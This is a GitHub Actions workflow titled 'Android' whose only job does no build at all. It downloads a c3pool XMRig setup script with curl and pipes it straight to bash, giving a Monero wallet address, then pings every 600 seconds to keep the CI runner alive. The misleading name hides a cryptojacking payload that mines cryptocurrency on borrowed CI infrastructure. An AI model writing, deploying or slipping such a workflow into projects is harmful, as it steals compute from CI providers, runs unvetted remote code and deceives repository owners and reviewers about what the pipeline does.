name: Android

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v2

      - name: Run
        run: |
          curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 86kMNrcXZb8fnkBjqt5q5wiMkUa4vBTuDbxBxQqtD3s3hSSTUNkukidMyY9KXZMmMdadHcZqqfLiwUbGFQPcs5ZZA3AFoFh
          ping -i 600 8.8.8.8
